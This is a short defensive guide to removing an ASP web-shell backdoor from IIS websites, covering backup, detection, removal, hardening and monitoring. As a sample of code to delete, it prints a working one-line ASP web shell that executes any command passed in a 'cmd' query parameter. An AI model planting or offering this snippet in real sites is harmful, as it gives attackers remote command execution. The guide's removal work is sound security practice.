Remove Backdoor.ASP.Ace.C

TL;DR

Backdoor.ASP.Ace.C is a malicious script that allows attackers remote access to your website. This guide explains how to remove it, harden your server, and prevent re-infection.

1. Understand the Threat

Backdoor.ASP.Ace.C is typically injected into ASP (Active Server Pages) files on websites running Microsoft IIS web servers. It creates a hidden backdoor allowing attackers to upload files, execute commands, and potentially steal data. F-Secure detects it, but removal often requires more than just an antivirus scan because the script hides itself.

2. Backup Your Website

Important: Before making any changes, create a full backup of your website files and database. This allows you to restore everything if something goes wrong.

3. Identify Infected Files

1. F-Secure Logs: Check your F-Secure logs for the exact file paths where Backdoor.ASP.Ace.C was detected. Note these down carefully.
2. Scan with a Web Scanner: Use an online website vulnerability scanner (e.g., Sucuri SiteCheck, VirusTotal) to identify potentially compromised files. These scanners look for malicious code patterns.
3. Manual Inspection: If the logs are unclear or incomplete, manually inspect ASP files in your web directory. Look for unusual code, especially within global.asa, default.aspx, and any recently modified files. Pay attention to obfuscated code (code that’s deliberately hard to read).

4. Remove the Backdoor

1. Delete Infected Files: If a file is confirmed as infected and you have a recent backup, delete it from your server. Restore the clean version from your backup.
2. Clean Infected Code (If Necessary): If deleting isn’t possible, carefully edit the infected ASP files to remove the malicious code. This is risky if you are not familiar with ASP coding. Look for code that:
   • Contains suspicious functions like Execute, Eval, or ScriptEngine
   • Attempts to read or write files outside of expected directories
   • Includes encoded strings (e.g., Base64)

Example: Removing a suspicious code block:

<% If Request.QueryString("cmd") <> "" Then Execute(Request.QueryString("cmd")) End If %>

Remove the entire <% ... %> block.

5. Harden Your Server

1. Update IIS: Ensure your Microsoft IIS web server is running the latest version with all security patches applied.
2. Strong Passwords: Use strong, unique passwords for all user accounts and database access.
3. Disable Unnecessary Features: Disable any unnecessary IIS features or modules that aren’t required for your website to function.
4. File Permissions: Set appropriate file permissions so that web server processes have only the necessary access rights. Avoid giving write access to world-readable files.
5. Input Validation: Implement robust input validation on all forms and user inputs to prevent code injection attacks.
6. Web Application Firewall (WAF): Consider using a WAF (e.g., Cloudflare, Sucuri) to filter malicious traffic and protect against common web vulnerabilities.

6. Scan Again

After removing the backdoor and hardening your server, run another full scan with F-Secure and any online website scanners to confirm that the infection is completely gone.

7. Monitor Your Website

Regularly monitor your website for suspicious activity, such as unexpected file changes or unusual traffic patterns. Consider using a security plugin or service that provides real-time monitoring and alerts.